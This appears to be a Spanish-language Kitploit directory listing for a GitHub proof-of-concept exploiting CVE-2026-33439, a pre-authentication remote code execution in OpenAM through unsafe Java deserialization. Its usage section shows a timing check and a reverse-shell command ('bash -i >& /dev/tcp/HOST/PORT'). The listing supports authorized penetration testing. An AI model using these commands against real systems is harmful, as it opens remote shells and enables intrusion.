Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33439-Poc — PoC para CVE-2026-33439, un RCE pre-auth en OpenAM mediante deserialización insegura de Java. | Kitploit
Herramientas/GitHubGitHub/rh33t/cve-2026-33439-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

PoC para CVE-2026-33439, un RCE pre-auth en OpenAM mediante deserialización insegura de Java.

Ver Repositorio
hace 14h 53mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33439

RCE pre-autenticación en OpenIdentityPlatform OpenAM mediante deserialización insegura de Java del parámetro jato.clientSession. Afecta a <= 16.0.5, corregido en 16.0.6.

Aviso: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

Uso

root@kitploit:~
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

La salida es ciega. La petición se bloquea hasta que el comando finaliza, por lo que el tiempo confirma la ejecución (--command 'sleep 5' tarda unos 5s).

Solo para pruebas de seguridad autorizadas.

Descargar herramienta